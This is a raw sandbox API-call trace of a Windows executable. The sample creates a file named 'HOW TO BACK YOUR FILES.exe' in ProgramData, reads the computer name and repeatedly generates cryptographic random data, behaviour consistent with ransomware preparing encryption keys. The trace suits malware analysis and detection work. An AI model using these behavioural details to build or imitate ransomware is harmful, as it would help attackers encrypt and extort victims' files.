lpStartupInfo=0x2afb74 | out: lpStartupInfo=0x2afb74*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aoldtz.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0032.155] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aoldtz.exe\" " [0032.155] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aoldtz.exe\" ", pNumArgs=0x2afb80 | out: pNumArgs=0x2afb80) returned 0x2c6db8*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aoldtz.exe" [0032.155] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aoldtz.exe") returned 48 [0032.155] lstrcatW (in: lpString1="", lpString2="aoldtz.exe" | out: lpString1="aoldtz.exe") returned="aoldtz.exe" [0032.155] lstrcpynW (in: lpString1=0x12c00e0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aoldtz.exe", iMaxLength=39 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0032.155] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0032.156] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="ids.txt" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" [0032.156] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2c7ff0 [0032.157] GetEnvironmentVariableW (in: lpName="allusersprofile", lpBuffer=0x12bfec0, nSize=0x104 | out: lpBuffer="C:\\ProgramData") returned 0xe [0032.157] lstrcatW (in: lpString1="C:\\ProgramData", lpString2="\\" | out: lpString1="C:\\ProgramData\\") returned="C:\\ProgramData\\" [0032.157] lstrcatW (in: lpString1="C:\\ProgramData\\", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe") returned="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" [0032.157] GetComputerNameW (in: lpBuffer=0x12b6e80, nSize=0x2ade68 | out: lpBuffer="XDUWTFONO", nSize=0x2ade68) returned 1 [0032.279] CryptAcquireContextW (in: phProv=0x2ad8d4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad8d4*=0x2c6ef0) returned 1 [0032.451] CryptGenRandom (in: hProv=0x2c6ef0, dwLen=0x80, pbBuffer=0x2ad8e8 | out: pbBuffer=0x2ad8e8) returned 1 [0032.451] CryptReleaseContext (hProv=0x2c6ef0, dwFlags=0x0) returned 1 [0032.451] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x4) returned 0x2c7150 [0032.451] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200) returned 0x2e72e8 [0032.451] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x80 [0032.452] GetLastError () returned 0x0 [0032.452] ReadFile (in: hFile=0x80, lpBuffer=0x2c7ff0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2ade68, lpOverlapped=0x0 | out: lpBuffer=0x2c7ff0*, lpNumberOfBytesRead=0x2ade68*=0x0, lpOverlapped=0x0) returned 1 [0032.452] GetSystemTime (in: lpSystemTime=0x12c06a0 | out: lpSystemTime=0x12c06a0*(wYear=0x7e3, wMonth=0x9, wDayOfWeek=0x5, wDay=0xd, wHour=0xd, wMinute=0x3a, wSecond=0x7, wMilliseconds=0x222)) [0032.452] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x4) returned 0x2c7160 [0032.452] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2c6eb8 [0032.452] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.453] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.453] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.453] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.453] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.453] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.454] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.454] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.454] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.454] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.455] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.455] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.455] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.456] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.456] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.456] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.457] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.457] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.457] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.458] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.458] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.458] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.459] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.459] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.459] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.460] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.460] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.460] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.460] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.460] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.460] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.461] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.461] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.461] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.462] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.462] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.462] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.463] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.463] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.463] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.464] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.464] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.464] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.464] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.464] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.464] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.465] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.465] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.525] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.526] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.526] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.526] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.527] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.527] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.527] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.528] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.528] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.528] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.529] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.529] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.529] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.530] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.530] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.530] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.530] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.530] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.530] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.531] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.531] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.531] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.532] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.532] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.532] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.533] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.533] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.533] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.533] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.533] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.534] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.534] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.534] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.534] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.535] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.535] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.535] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.536] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.536] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.536] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.537] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.537] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.537] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.538] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.538] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.538] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.538] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.539] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.598] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.603] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.603] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.603] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.604] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.604] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.604] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.605] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.605] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.605] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.606] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.606] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.606] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2e6bf8 [0032.606] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2e6c80 [0032.606] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2e80f0 [0032.606] CryptAcquireContextW (in: phProv=0x2ad724, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad724*=0x2e8178) returned 1 [0032.607] CryptGenRandom (in: hProv=0x2e8178, dwLen=0x80, pbBuffer=0x2ad738 | out: pbBuffer=0x2ad738) returned 1 [0032.607] CryptReleaseContext (hProv=0x2e8178, dwFlags=0x0) returned 1 [0032.607] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8178 [0032.607] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e80f0 | out: hHeap=0x2b0000) returned 1 [0032.607] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8208 [0032.607] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x108) returned 0x2e8298 [0032.607] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x4) returned 0x2e7d08 [0032.607] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2e83a8 [0032.607] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.607] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2e84b8 [0032.607] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2e80f0 [0032.607] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x10c) returned 0x2e85c8 [0032.607] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.607] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xc) returned 0x2bef88 [0032.607] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e86e0 [0032.607] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e80f0 | out: hHeap=0x2b0000) returned 1 [0032.607] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2e8770 [0032.607] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e86e0 | out: hHeap=0x2b0000) returned 1 [0032.607] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.607] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xc) returned 0x2befa0 [0032.607] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.607] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.607] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x88) returned 0x2e86e0 [0032.607] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2befa0 | out: hHeap=0x2b0000) returned 1 [0032.607] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2e8880 [0032.607] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e86e0 | out: hHeap=0x2b0000) returned 1 [0032.607] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.607] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.607] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.607] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.607] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.608] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.608] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.608] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.608] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.608] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.608] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.608] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.608] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.608] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.608] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.608] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.608] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.608] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.608] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.608] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.608] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.608] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.608] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.608] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.608] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.608] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.608] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.608] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.608] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.608] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.608] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.608] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.608] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.608] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.608] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.608] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.608] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.608] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.608] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.608] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.608] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.608] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.609] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 